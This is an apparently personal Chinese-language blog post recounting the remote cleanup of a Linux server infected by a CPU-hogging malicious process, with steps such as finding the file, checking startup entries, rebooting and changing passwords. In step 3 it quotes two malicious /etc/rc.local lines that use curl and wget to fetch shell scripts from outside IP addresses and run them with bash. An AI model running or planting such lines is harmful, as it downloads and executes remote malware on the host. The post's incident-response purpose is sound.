CPU利用率很高 800%爆了

Posted 2020-10-23

快下班，问题来了

记一次快下班的记录

快下班了，好友发来了一张照片，如下：

中毒了，没问题，肯定是！！！

开始qq对话解决

**有监控吗，快速查看流量图，看看是否发包或者被发包？**
答曰：没有监控
**那查看一下交换机的接口流量呢？**
答曰：交换机是傻瓜二层的
**那看看防火墙的呢？**
查看流量并没有什么影响。

实在是解决太慢了，而对方的机器是内容，最后通过内容的某太机器，我远程朋友的qq桌面，远程服务器，10分钟后终于连接上了。

开始远程解决问题

1、find / -name cranber* #查看占用cpu文件的位置
2、mv /cranber* /cranber.bak 
                #将发包文件移动位置，让程序启动的时候找不到它。
                本次的文件是在/ 根目录下，具体文件名我就不写出来了。
3、cat /etc/rc.local  
                #查看系统启动文件有没有异常的启动项，结果发现了，如下：
                    #curl http://207.246.68.21/rootv2.sh > /etc/root.sh ; wget -P /etc http://207.246.68.21/rootv2.sh ; rm -rf /etc/root.sh.* ; bash /etc/root.sh 
                    #curl http://172.96.252.86/rootv3.sh > /etc/root.sh ; wget -O /etc/root.sh http://172.96.252.86/rootv3.sh ; bash /etc/root.sh 
4、先将这两行 注释掉再说。
5、查看步骤3 下载下来的root开头的文件
            find / -name root*
            显示都是以root.sh开头的 ，如：root.sh、root.sh.1、root.sh.2、
            目录都在/etc下边
6、移动root.sh 开头的文件到随便一个目录
            mkdir /root/bak
            mv /etc/root.sh* /root/bak
7、重启服务器
            目的是通过重启服务器关掉病毒进程，同时查看还有没有别的病毒脚本，在启动的时候跟着系统启动。
8、系统起来之后
            通过top命令查看，系统已经恢复正常，没有什么异常了。又观察了10分钟，并没有什么问题了。
9、修改密码
             这时候应该及时修改 系统密码、数据库密码、以及相关的密码。
10、备份数据
            备份相关的重要数据，以便系统如果被黑到无法恢复的地步，还有后手。

总结

初步判断本次中毒原因为密码被漏扫，暴力破解了。

日常运维
        必须有监控
        必须有监控报警
        必须有密码复杂机制
        必须有密码更新机制
        必须有运维技术能力
        （最关键：人外有人、天外有天、还得有人脉）